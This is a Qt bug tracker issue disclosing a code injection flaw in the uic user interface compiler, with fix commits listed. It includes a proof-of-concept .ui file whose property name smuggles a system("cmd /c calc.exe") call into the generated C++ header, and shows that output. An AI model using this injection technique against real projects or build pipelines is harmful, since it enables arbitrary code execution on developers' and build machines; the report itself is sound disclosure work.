Uploaded image for project: 'Qt'
  1. Qt
  2. QTBUG-126265

uic: Code Injection to Potential Code Execution

    XMLWordPrintable

Details

    • All
    • 53c8d1fe7 (dev), 690c2f2d6 (6.8), d9f5b6170 (6.7), aae20da52 (dev), 0925c2d80 (6.8), 24dfadbf7 (6.7)

    Description

      Due to improper parsing in the .ui file, a user can inject a malicious code into the XML design files and the generated code by uic will include the malicious code. Without proper inspection of the generated code, or a case where an automated system is being use to generate the code and automatically compiles the code, can lead to an arbitrary code execution.

      Given this .ui, let's generate the C++ code using uic:

      <?xml version="1.0" encoding="UTF-8"?>
      <ui version="4.0">
          <class&gt;MainWindow</class&gt;
          <widget class="QMainWindow" name="MainWindow">
              <property name="geometry">
                  <rect>
                      <x>0</x>
                      <y>0</y>
                      <width>1000</width>
                      <height>500</height>
                  </rect>
              </property>
              <property name="windowTitle">
                  <string>MainWindow</string>
              </property>
              <widget class="QWidget" name="centralwidget">
                  <widget class="QLabel" name="label">
                      <property name="geometry">
                          <rect>
                              <x>10</x>
                              <y>0</y>
                              <width>1000</width>
                              <height>50</height>
                          </rect>
                      </property>
                      <property name="text(&quot;Hello world!&quot;); system(&quot;cmd /c calc.exe&quot;);//">
                          <string>TextLabel</string>
                      </property>
                  </widget>
              </widget>
          </widget>
          <resources/>
          <connections/>
      </ui>

      The following is the result of the converted code:

      /********************************************************************************
      ** Form generated from reading UI file 'untitled.ui'
      **
      ** Created by: Qt User Interface Compiler version 5.11.1
      **
      ** WARNING! All changes made in this file will be lost when recompiling UI file!
      ********************************************************************************/
      #ifndef UNTITLED_H
      #define UNTITLED_H
      #include <QtCore/QVariant>
      #include <QtWidgets/QApplication>
      #include <QtWidgets/QLabel>
      #include <QtWidgets/QMainWindow>
      #include <QtWidgets/QWidget>
      
      QT_BEGIN_NAMESPACE
      class Ui_MainWindow
      {
      public:
          QWidget *centralwidget;
          QLabel *label;
          void setupUi(QMainWindow *MainWindow)
          {
              if (MainWindow->objectName().isEmpty())
                  MainWindow->setObjectName(QStringLiteral("MainWindow"));
              MainWindow->resize(1000, 500);
              centralwidget = new QWidget(MainWindow);
              centralwidget->setObjectName(QStringLiteral("centralwidget"));
              label = new QLabel(centralwidget);
              label->setObjectName(QStringLiteral("label"));
              label->setGeometry(QRect(10, 0, 1000, 50));
              MainWindow->setCentralWidget(centralwidget);
              retranslateUi(MainWindow);
              QMetaObject::connectSlotsByName(MainWindow);
          } // setupUi
          void retranslateUi(QMainWindow *MainWindow)
          {
              MainWindow->setWindowTitle(QApplication::translate("MainWindow", "MainWindow", nullptr));
              label->setText("Hello world!"); system("cmd /c calc.exe");//(QApplication::translate("MainWindow", "TextLabel", nullptr));
          } // retranslateUi
      };
      
      namespace Ui {
          class MainWindow: public Ui_MainWindow {};
      } 
      
      // namespace
      UiQT_END_NAMESPACE
      
      #endif // UNTITLED_H

      This behavior also works on the Python version of the compiler (pyuic).

      Please let me know if this is considered as a security issue, because it is ambigous given that the uic or pyuic might be used in an automated environment that compiles the generated code.

       

      Attachments

        For Gerrit Dashboard: QTBUG-126265
        # Subject Branch Project Status CR V

        Activity

          People

            jkobus Jarek Kobus
            aimardcr Aimar Adhity
            Votes:
            0 Vote for this issue
            Watchers:
            4 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved:

              Gerrit Reviews